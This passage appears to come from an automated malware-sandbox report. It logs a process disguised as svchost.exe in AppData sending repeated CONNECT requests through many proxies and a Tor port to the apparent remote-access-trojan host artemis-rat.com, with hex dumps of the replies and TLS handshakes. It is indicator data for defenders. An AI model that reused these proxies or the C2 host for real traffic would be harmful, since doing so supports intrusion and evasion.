                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2150192.168.2.55668082.64.77.308043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.038134098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.773663998 CET555INHTTP/1.1 403 Proxy Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: Apache
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Content-Length: 313
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2151192.168.2.556655162.55.87.48556643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.038175106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.880213976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:30.194761992 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2152192.168.2.556869104.16.108.2348043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.038733006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.193355083 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2153192.168.2.556871172.67.69.98043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.038779974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.193126917 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2154192.168.2.556246120.197.40.219900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.039856911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.711044073 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2155192.168.2.5566798.222.152.1585555543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.040364981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.378794909 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2156192.168.2.556733104.249.29.74576743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.040909052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.327056885 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2157192.168.2.55566551.158.124.1671637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.040955067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.145924091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.146533012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2158192.168.2.556589103.190.54.1418043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.041191101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.412157059 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:31.412434101 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a6 de e0 c7 82 c1 3d 2a 72 85 4f aa be ff 34 2d 86 6e 4b 84 ac da f0 bb 68 ef 64 68 83 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eR=*rO4-nKhdh*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:32.155590057 CET1286INData Raw: 16 03 03 00 43 02 00 00 3f 03 03 65 ec 52 a7 d4 5c 12 42 fe 88 6d 26 b1 99 47 9e 93 12 97 16 72 6d 71 b7 44 4f 57 4e 47 52 44 01 00 c0 2f 00 00 17 00 00 00 00 00 17 00 00 ff 01 00 01 00 00 0b 00 02 01 00 00 23 00 00 16 03 03 10 6b 0b 00 10 67 00
                                                                                    Data Ascii: C?eR\Bm&GrmqDOWNGRD/#kgde0a0I?LR0*H0F10UUS1"0 UGoogle Trust Services LLC10UGTS CA 1P50240214225240Z240514225239Z010
                                                                                    Mar 9, 2024 13:14:32.155613899 CET1286INData Raw: 98 6e 71 f4 11 ac 4d b8 a7 7d 6f da c6 bc f4 b1 9e 56 4d 29 6b 80 18 2b 54 cc 2f af 96 ce 21 d1 4a a2 d6 af dc dc c3 23 73 8a f8 60 aa 82 11 8f 73 e6 dd de ff f1 c4 74 75 19 89 f2 11 f3 81 b3 5c 09 1f 05 21 66 f5 dc f5 01 c2 34 dc e1 8e 2b 77 c7
                                                                                    Data Ascii: nqM}oVM)k+T/!J#s`stu\!f4+wF3yO3RDw.QJRh8?hXZR`UHG3XF%~ t\5|0F<Arp'~00tP'S"0*H0G10UUS
                                                                                    Mar 9, 2024 13:14:32.155690908 CET1286INData Raw: 9f 57 a9 41 6d 5a 90 a7 db 3a ea 75 80 0c 63 0b 69 74 6f 07 4c 15 f3 37 28 a5 19 a4 6e f5 f6 20 cd 63 b2 7e c4 2b 09 75 89 da d1 3c 2e 72 4f 36 1a a1 9e 44 d0 cd 9b a6 23 08 3f 97 a1 a7 9e 5a a5 f7 09 94 ad 5d 76 5d 28 56 d1 1a 66 51 51 07 7b de
                                                                                    Data Ascii: WAmZ:ucitoL7(n c~+u<.rO6D#?Z]v](VfQQ{=0z$-KO?*'>#ZB-z6=`9c*xN!>\9+S/tgw7-[peZ%wjNuMjfynm"m,P5}pY*
                                                                                    Mar 9, 2024 13:14:32.155730009 CET736INData Raw: 30 02 86 1d 68 74 74 70 3a 2f 2f 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e 63 72 74 30 32 06 03 55 1d 1f 04 2b 30 29 30 27 a0 25 a0 23 86 21 68 74 74 70 3a 2f 2f 63 72 6c 2e 70 6b 69 2e 67 6f 6f 67 2f 67 73 72 31 2f 67 73 72 31 2e
                                                                                    Data Ascii: 0http://pki.goog/gsr1/gsr1.crt02U+0)0'%#!http://crl.pki.goog/gsr1/gsr1.crl0;U 4020g0g0+y0+y0*H4(v1z!R>tA=5\_|W&o[Fh7okz7%QhIZ
                                                                                    Mar 9, 2024 13:14:32.217601061 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 49 3f 68 06 9f e2 75 e7 93 03 ab e7 dd 5e 78 36 1f da 85 a7 14 ac a5 51 a4 a1 36 ac e0 44 74 02 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 72 04 46 0d 2f b5 12 d8 61 4a 61 f0 fa d3 6b 56 ac 93 26 19 11
                                                                                    Data Ascii: %! I?hu^x6Q6Dt(rF/aJakV&Fy\&o
                                                                                    Mar 9, 2024 13:14:32.708590031 CET258INData Raw: 16 03 03 00 ca 04 00 00 c6 00 00 fd 1f 00 c0 5a 17 6c fc 96 79 f4 13 45 84 8d 90 63 af ff 94 97 5b 49 d7 e9 a4 8f c5 36 0b f1 e1 d9 05 8c e3 cf f2 3f e5 cd bc 32 46 86 1b ec 1d ce fa 6d ee 71 e7 6c 3f eb 92 6a 2e fd 9c 40 5e e3 02 44 ea 31 41 ca
                                                                                    Data Ascii: ZlyEc[I6?2Fmql?j.@^D1AmFZZ7Odz%<-\>MscL)aVLT0rK-V}D(dpwW`'A9n(r?B}
                                                                                    Mar 9, 2024 13:14:32.712955952 CET252OUTData Raw: 17 03 03 00 f7 00 00 00 00 00 00 00 01 05 6a 4a 01 ab 3c 2e 46 4d 4c 01 d1 94 d1 72 10 f1 34 b0 fe 2e 53 9e fb fc 6b b1 d2 f0 97 6a 91 d2 70 6b 59 3a a1 a7 e0 2a b9 0a f0 2c 01 a3 06 be e2 2c bd 05 54 ad 15 d0 0b f1 5e 66 9f c3 96 21 1b 66 e7 65
                                                                                    Data Ascii: jJ<.FMLr4.SkjpkY:*,,T^f!fekZHF=xeL73Mma5&Yz6HVd8q\Uod;Rb$O)Vf*+)]g+:G 6E-(jq"y(/>ACBh;m
                                                                                    Mar 9, 2024 13:14:33.216023922 CET1286INData Raw: 17 03 03 05 71 00 00 00 00 00 00 00 01 95 15 fe a8 be e0 91 fb d6 39 52 34 3d f5 53 83 07 ff 78 a8 e5 19 be ee b5 c1 22 46 75 9e 7e 2a 73 2c 80 65 73 a1 25 70 be 0e d8 e6 1d 94 f1 2a 02 fe e9 96 fa 90 df 8c 5a 4f b2 bd a6 a0 a6 e4 b3 c3 3f f3 d6
                                                                                    Data Ascii: q9R4=Sx"Fu~*s,es%p*ZO?2MHat5kuv_m"L=5Fuq1#W >Z!,Z|zp$kt$dggVInRcyzj./qT]9re_M
                                                                                    Mar 9, 2024 13:14:33.216080904 CET1286INData Raw: fe 25 27 48 55 80 02 c8 5c 42 f1 09 1b 84 9a 5a f8 54 e5 4f 1e 46 a5 ba ff 20 01 87 9f f2 18 b8 2e c8 81 80 44 cc aa 08 31 3b 82 ab 63 d8 32 df b9 39 90 7e 0a 72 22 bf 38 69 1e 7c 01 51 55 4a 19 88 43 b5 35 2c b1 82 db df 29 1c 87 24 9d 3e ba 8a
                                                                                    Data Ascii: %'HU\BZTOF .D1;c29~r"8i|QUJC5,)$><<C"(!2_2s[f6*qOM&1{?q$+$o8v!'a\yNF-86cE![G*DoVum,^I%E]>5


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2159192.168.2.556921104.17.171.798043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.041390896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.195820093 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2160192.168.2.55667893.90.212.2415343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.041457891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2161192.168.2.55674018.185.169.150312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.041486025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.346529961 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2162192.168.2.556929185.238.228.2028043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.041569948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.196398020 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2163192.168.2.556864184.60.66.1228043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:29.041570902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.273294926 CET1286INHTTP/1.1 302 Found
                                                                                    Date: Sat, 09 Mar 2024 12:14:29 GMT
                                                                                    Server: Apache/2.4.56 (Debian)
                                                                                    Location: https://artemis-rat.com:443/index.php
                                                                                    Content-Length: 3214
                                                                                    Content-Type: text/html; charset=UTF-8
